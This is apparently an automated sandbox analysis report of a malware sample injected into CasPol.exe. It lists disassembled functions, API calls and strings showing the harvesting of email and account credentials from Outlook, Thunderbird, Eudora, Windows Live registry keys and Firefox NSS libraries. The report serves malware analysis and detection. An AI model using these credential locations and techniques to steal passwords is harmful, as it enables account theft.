409adf 34244->34245 34248 407a55 free 34244->34248 34246 409af2 free 34245->34246 34249 407a55 free 34245->34249 34246->34221 34247->34244 34250 409ad8 ??3@YAXPAX 34248->34250 34251 409aeb ??3@YAXPAX 34249->34251 34250->34245 34251->34246 34254 40412a 34253->34254 34255 4078f3 ??3@YAXPAX 34253->34255 34256 404a3a 34254->34256 34255->34254 34257 404a41 34256->34257 34258 40412f 34256->34258 34261 4047cb 11 API calls 34257->34261 34258->34231 34258->34232 34260 404a4c 34260->34258 34261->34260 34270 411853 RtlInitializeCriticalSection memset 34271 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34446 40a256 13 API calls 34448 432e5b 17 API calls 34450 43fa5a 20 API calls 34273 401060 41 API calls 34453 427260 CloseHandle memset memset 34277 410c68 FindResourceA SizeofResource LoadResource LockResource 34455 405e69 14 API calls 34279 433068 15 API calls __fprintf_l 34457 414a6d 18 API calls 34458 43fe6f 134 API calls 34281 424c6d 15 API calls __fprintf_l 34459 426741 19 API calls 34283 440c70 17 API calls 34284 443c71 44 API calls 34287 427c79 24 API calls 34462 416e7e memset __fprintf_l 34291 42800b 47 API calls 34292 425115 85 API calls __fprintf_l 34465 41960c 61 API calls 34293 43f40c 122 API calls __fprintf_l 34296 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34297 43f81a 20 API calls 34299 414c20 memset memset 34300 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34469 414625 18 API calls 34470 404225 modf 34471 403a26 strlen WriteFile 34473 40422a 12 API calls 34477 427632 memset memset memcpy 34478 40ca30 59 API calls 34479 404235 26 API calls 34301 42ec34 61 API calls __fprintf_l 34302 425115 76 API calls __fprintf_l 34480 425115 77 API calls __fprintf_l 34482 44223a 38 API calls 34308 43183c 112 API calls 34483 44b2c5 _onexit __dllonexit 34488 42a6d2 memcpy __allrem 34310 405cda 66 API calls 34496 43fedc 138 API calls 34497 4116e1 16 API calls __fprintf_l 34313 4244e6 19 API calls 34315 42e8e8 127 API calls __fprintf_l 34316 4118ee RtlLeaveCriticalSection 34502 43f6ec 22 API calls 34318 425115 119 API calls __fprintf_l 34319 410cf3 EnumResourceNamesA 34505 4492f0 memcpy memcpy 34507 43fafa 18 API calls 34509 4342f9 15 API calls __fprintf_l 34320 4144fd 19 API calls 34511 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34512 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34515 443a84 _mbscpy 34517 43f681 17 API calls 34323 404487 22 API calls 34519 415e8c 16 API calls __fprintf_l 34327 411893 RtlDeleteCriticalSection __fprintf_l 34328 41a492 42 API calls 34523 403e96 34 API calls 34524 410e98 memset SHGetPathFromIDList SendMessageA 34330 426741 109 API calls __fprintf_l 34331 4344a2 18 API calls 34332 4094a2 10 API calls 34527 4116a6 15 API calls __fprintf_l 34528 43f6a4 17 API calls 34529 440aa3 20 API calls 34531 427430 45 API calls 34335 4090b0 7 API calls 34336 4148b0 15 API calls 34338 4118b4 RtlEnterCriticalSection 34339 4014b7 CreateWindowExA 34340 40c8b8 19 API calls 34342 4118bf RtlTryEnterCriticalSection 34536 42434a 18 API calls __fprintf_l 34538 405f53 12 API calls 34350 43f956 59 API calls 34352 40955a 17 API calls 34353 428561 36 API calls 34354 409164 7 API calls 34542 404366 19 API calls 34546 40176c ExitProcess 34549 410777 42 API calls 34359 40dd7b 51 API calls 34360 425d7c 16 API calls __fprintf_l 34551 43f6f0 25 API calls 34552 42db01 22 API calls 34361 412905 15 API calls __fprintf_l 34553 403b04 54 API calls 34554 405f04 SetDlgItemTextA GetDlgItemTextA 34555 44b301 ??3@YAXPAX 34558 4120ea 14 API calls 3 library calls 34559 40bb0a 8 API calls 34561 413f11 strcmp 34365 434110 17 API calls __fprintf_l 34368 425115 108 API calls __fprintf_l 34562 444b11 _onexit 34370 425115 76 API calls __fprintf_l 34373 429d19 10 API calls 34565 444b1f __dllonexit 34566 409f20 _strcmpi 34375 42b927 31 API calls 34569 433f26 19 API calls __fprintf_l 34570 44b323 FreeLibrary 34571 427f25 46 API calls 34572 43ff2b 17 API calls 33185 444b36 33188 444b10 33185->33188 33187 444b3f 33189 444b1f __dllonexit 33188->33189 33190 444b19 _onexit 33188->33190 33189->33187 33190->33189 34573 43fb30 19 API calls 34382 414d36 16 API calls 34384 40ad38 7 API calls 34575 433b38 16 API calls __fprintf_l 34576 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34388 426741 21 API calls 34389 40c5c3 125 API calls 34391 43fdc5 17 API calls 34577 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34394 4161cb memcpy memcpy memcpy memcpy 33200 44b3cf 33201 44b3e6 33200->33201 33203 44b454 33200->33203 33201->33203 33207 44b40e 33201->33207 33204 44b405 33204->33203 33205 44b435 VirtualProtect 33204->33205 33205->33203 33206 44b444 VirtualProtect 33205->33206 33206->33203 33208 44b413 33207->33208 33210 44b454 33208->33210 33214 44b42b 33208->33214 33211 44b41c 33211->33210 33212 44b435 VirtualProtect 33211->33212 33212->33210 33213 44b444 VirtualProtect 33212->33213 33213->33210 33215 44b431 33214->33215 33216 44b435 VirtualProtect 33215->33216 33218 44b454 33215->33218 33217 44b444 VirtualProtect 33216->33217 33216->33218 33217->33218 34582 43ffc8 18 API calls 34395 4281cc 15 API calls __fprintf_l 34584 4383cc 110 API calls __fprintf_l 34396 4275d3 41 API calls 34585 4153d3 22 API calls __fprintf_l 34397 444dd7 _XcptFilter 34590 4013de 15 API calls 34592 425115 111 API calls __fprintf_l 34593 43f7db 18 API calls 34596 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34399 4335ee 16 API calls __fprintf_l 34598 429fef 11 API calls 34400 444deb _exit _c_exit 34599 40bbf0 139 API calls 34403 425115 79 API calls __fprintf_l 34603 437ffa 22 API calls 34407 4021ff 14 API calls 34408 43f5fc 149 API calls 34604 40e381 9 API calls 34410 405983 40 API calls 34411 42b186 27 API calls __fprintf_l 34412 427d86 76 API calls 34413 403585 20 API calls 34415 42e58e 18 API calls __fprintf_l 34418 425115 75 API calls __fprintf_l 34420 401592 8 API calls 33191 410b92 33194 410a6b 33191->33194 33193 410bb2 33195 410a77 33194->33195 33196 410a89 GetPrivateProfileIntA 33194->33196 33199 410983 memset _itoa WritePrivateProfileStringA 33195->33199 33196->33193 33198 410a84 33198->33193 33199->33198 34608 434395 16 API calls 34422 441d9c memcmp 34610 43f79b 119 API calls 34423 40c599 43 API calls 34611 426741 87 API calls 34427 4401a6 21 API calls 34429 426da6 memcpy memset memset memcpy 34430 4335a5 15 API calls 34432 4299ab memset memset memcpy memset memset 34433 40b1ab 8 API calls 34616 425115 76 API calls __fprintf_l 34620 4113b2 18 API calls 2 library calls 34624 40a3b8 memset sprintf SendMessageA 33219 410bbc 33222 4109cf 33219->33222 33223 4109dc 33222->33223 33224 410a23 memset GetPrivateProfileStringA 33223->33224 33225 4109ea memset 33223->33225 33230 407646 strlen 33224->33230 33235 4075cd sprintf memcpy 33225->33235 33228 410a0c WritePrivateProfileStringA 33229 410a65 33228->33229 33231 40765a 33230->33231 33233 40765c 33230->33233 33231->33229 33232 4076a3 33232->33229 33233->33232 33236 40737c strtoul 33233->33236 33235->33228 33236->33233 34435 40b5bf memset memset _mbsicmp

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 159 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 160 408450-408453 159->160 161 40841c 159->161 163 408484-408488 160->163 164 408455-40845e 160->164 162 408422-40842b 161->162 165 408432-40844e 162->165 166 40842d-408431 162->166 167 408460-408464 164->167 168 408465-408482 164->168 165->160 165->162 166->165 167->168 168->163 168->164
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                  • memset.MSVCRT ref: 00408343
                                                                                                                                                                                  • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                  • memset.MSVCRT ref: 00408376
                                                                                                                                                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                  • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                  • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                  • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                  • API String ID: 1832431107-3760989150
                                                                                                                                                                                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                  Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                  • String ID: ACD
                                                                                                                                                                                  • API String ID: 379999529-620537770
                                                                                                                                                                                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                                                  Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                    • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                  • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                  • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                  • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                  • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                  • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                  • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                  • memset.MSVCRT ref: 00402003
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  • memset.MSVCRT ref: 00402086
                                                                                                                                                                                  • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                  • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                  • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                  • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                  • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                  • memset.MSVCRT ref: 00402018
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                  • API String ID: 52128907-4223776976
                                                                                                                                                                                  • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                                                                                                                  Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402869
                                                                                                                                                                                    • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                    • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                  • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                  • API String ID: 1497257669-167382505
                                                                                                                                                                                  • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                  • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                  • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                  Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                  • API String ID: 745651260-375988210
                                                                                                                                                                                  • Opcode ID: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                                                                                                                                                                                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                  • Opcode Fuzzy Hash: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                                                                                                                  Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                  • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                  • API String ID: 1197458902-317895162
                                                                                                                                                                                  • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                                                                                                                                  Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 261 444c4a-444c66 call 444e38 GetModuleHandleA 264 444c87-444c8a 261->264 265 444c68-444c73 261->265 267 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 264->267 265->264 266 444c75-444c7e 265->266 269 444c80-444c85 266->269 270 444c9f-444ca3 266->270 275 444d02-444d0d __setusermatherr 267->275 276 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 267->276 269->264 273 444c8c-444c93 269->273 270->264 271 444ca5-444ca7 270->271 274 444cad-444cb0 271->274 273->264 277 444c95-444c9d 273->277 274->267 275->276 280 444da4-444da7 276->280 281 444d6a-444d72 276->281 277->274 282 444d81-444d85 280->282 283 444da9-444dad 280->283 284 444d74-444d76 281->284 285 444d78-444d7b 281->285 287 444d87-444d89 282->287 288 444d8b-444d9c GetStartupInfoA 282->288 283->280 284->281 284->285 285->282 286 444d7d-444d7e 285->286 286->282 287->286 287->288 289 444d9e-444da2 288->289 290 444daf-444db1 288->290 291 444db2-444dc6 GetModuleHandleA call 40cf44 289->291 290->291 294 444dcf-444e0f _cexit call 444e71 291->294 295 444dc8-444dc9 exit 291->295 295->294
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                  • String ID: 2t
                                                                                                                                                                                  • API String ID: 3662548030-3527913779
                                                                                                                                                                                  • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                  • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                                                  • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                  • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                                                                                                                                  Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 299 40fb00-40fb35 call 44b090 RegOpenKeyExA 302 40fc37-40fc3d 299->302 303 40fb3b-40fb4f RegOpenKeyExA 299->303 304 40fb55-40fb7e RegQueryValueExA 303->304 305 40fc2d-40fc31 RegCloseKey 303->305 306 40fc23-40fc27 RegCloseKey 304->306 307 40fb84-40fb93 call 404734 304->307 305->302 306->305 307->306 310 40fb99-40fbd1 call 4047a5 307->310 310->306 313 40fbd3-40fbdb 310->313 314 40fc19-40fc1d LocalFree 313->314 315 40fbdd-40fc14 memcpy * 2 call 40f802 313->315 314->306 315->314
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                                                                                  • API String ID: 2768085393-2409096184
                                                                                                                                                                                  • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
